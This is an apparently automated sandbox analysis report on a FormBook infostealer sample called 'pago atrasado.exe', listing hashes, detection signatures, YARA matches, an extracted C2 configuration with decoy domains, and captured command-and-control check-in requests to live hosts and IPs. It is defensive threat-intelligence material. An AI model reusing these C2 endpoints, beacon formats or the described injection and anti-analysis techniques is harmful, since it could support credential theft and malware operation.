Windows Analysis Report pago atrasado.exe

Overview

General Information

Sample Name: pago atrasado.exe
Analysis ID: 502137
MD5: f841c72b1c4cadc4c98903ad26a96a16
SHA1: 06359aaf42a5ce60889ab7a93d8af7702b34630a
SHA256: eaa038a0020fee7ddfe2919203f20f15ca1d7eb19d90b168cade93b5cf8d7f43
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection:

Found malware configuration
Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.crisisinterventionadvocates.com/u9xn/"], "decoy": ["lifeguardingcoursenearme.com", "bolsaspapelcdmx.com", "parsleypkllqu.xyz", "68134.online", "shopthatlookboutique.com", "canlibahisportal.com", "oligopoly.city", "srchwithus.online", "151motors.com", "17yue.info", "auntmarysnj.com", "hanansalman.com", "heyunshangcheng.info", "doorslamersplus.com", "sfcn-dng.com", "highvizpeople.com", "seoexpertinbangladesh.com", "christinegagnonjewellery.com", "artifactorie.biz", "mre3.net", "webbyteanalysis.online", "medicmir.store", "shdxh.com", "salvationshippingsecurity.com", "michita.xyz", "itskosi.com", "aligncoachingconsulting.com", "cryptorickclub.art", "cyliamartisbackup.com", "ttemola.com", "mujeresenfarmalatam.com", "mykombuchafactory.com", "irasutoya-ryou.com", "envtmyouliqy.mobi", "expert-rse.com", "oddanimalsink.com", "piezoelectricenergy.com", "itservices-india.com", "wintwiin.com", "umgaleloacademy.com", "everythangbutwhite.com", "ishhs.xyz", "brandsofcannabis.com", "sculptingstones.com", "hilldetailingllc.com", "stone-project.net", "rbrituelbeaute.com", "atzoom.store", "pronogtiki.store", "baybeg.com", "b148tlrfee9evtvorgm5947.com", "msjanej.com", "western-overseas.info", "sharpecommunications.com", "atlantahomesforcarguys.com", "neosudo.com", "blulacedefense.com", "profilecolombia.com", "blacksaltspain.com", "sejiw3.xyz", "saint444.com", "getoken.net", "joycegsy.com", "fezora.xyz"]}
Yara detected FormBook
Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: pago atrasado.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.pago atrasado.exe.2330000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 16.2.colorcpl.exe.4a4796c.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 16.2.colorcpl.exe.2b2c88.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.pago atrasado.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.pago atrasado.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: pago atrasado.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: colorcpl.pdbGCTL source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
Source: Binary string: colorcpl.pdb source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: pago atrasado.exe, 00000000.00000003.243423683.000000000F230000.00000004.00000001.sdmp, pago atrasado.exe, 00000001.00000003.248757919.0000000000670000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: pago atrasado.exe, colorcpl.exe
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00405E93 FindFirstFileA,FindClose, 0_2_00405E93
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_004054BD
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00402671 FindFirstFileA, 0_2_00402671

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 4x nop then pop ebx 1_2_00406AB4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4x nop then pop ebx 16_2_02B06AB5

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.crisisinterventionadvocates.com
Source: C:\Windows\explorer.exe Domain query: www.ttemola.com
Source: C:\Windows\explorer.exe Network Connect: 208.91.197.27 80
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe Network Connect: 46.101.121.244 80
Source: C:\Windows\explorer.exe Network Connect: 74.208.236.134 80
Source: C:\Windows\explorer.exe Domain query: www.baybeg.com
Source: C:\Windows\explorer.exe Domain query: www.everythangbutwhite.com
Source: C:\Windows\explorer.exe Domain query: www.highvizpeople.com
Source: C:\Windows\explorer.exe Domain query: www.itskosi.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.oddanimalsink.com
Source: C:\Windows\explorer.exe Domain query: www.ishhs.xyz
Source: C:\Windows\explorer.exe Domain query: www.sfcn-dng.com
Source: C:\Windows\explorer.exe Domain query: www.umgaleloacademy.com
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.ishhs.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.crisisinterventionadvocates.com/u9xn/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View ASN Name: AMAZON-02US
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1Host: www.highvizpeople.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1Host: www.oddanimalsink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1Host: www.itskosi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1Host: www.crisisinterventionadvocates.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1Host: www.everythangbutwhite.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.91.197.27
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 14:44:25 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9601-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 13 Oct 2021 14:44:46 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 
3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.otf
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/27586/searchbtn.png)
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/BG_2.png)
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/Left.png)
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/Right.png)
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
Source: pago atrasado.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: pago atrasado.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.Highvizpeople.com
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.everythangbutwhite.com
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.everythangbutwhite.com/
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/10_Best_Mutual_Funds.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/Accident_Lawyers.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FL
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/Best_Penny_Stocks.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2F
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/Migraine_Pain_Relief.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/__media__/design/underconstructionnotice.php?d=highvizpeople.com
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/__media__/js/trademark.php?d=highvizpeople.com&type=ns
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/display.cfm
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/px.js?ch=1
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/px.js?ch=2
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/sk-logabpstatus.php?a=MzZzaVd5UDZhY0hEU3Z1UzFXVHRjNXcrTjlwaWZWbWlYbHV5Y
Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmp String found in binary or memory: http://www.highvizpeople.com/song_lyrics.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FLdrtTp
Source: unknown DNS traffic detected: queries for: www.highvizpeople.com
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1Host: www.highvizpeople.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1Host: www.oddanimalsink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1Host: www.itskosi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1Host: www.crisisinterventionadvocates.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1Host: www.everythangbutwhite.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00404FC2

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
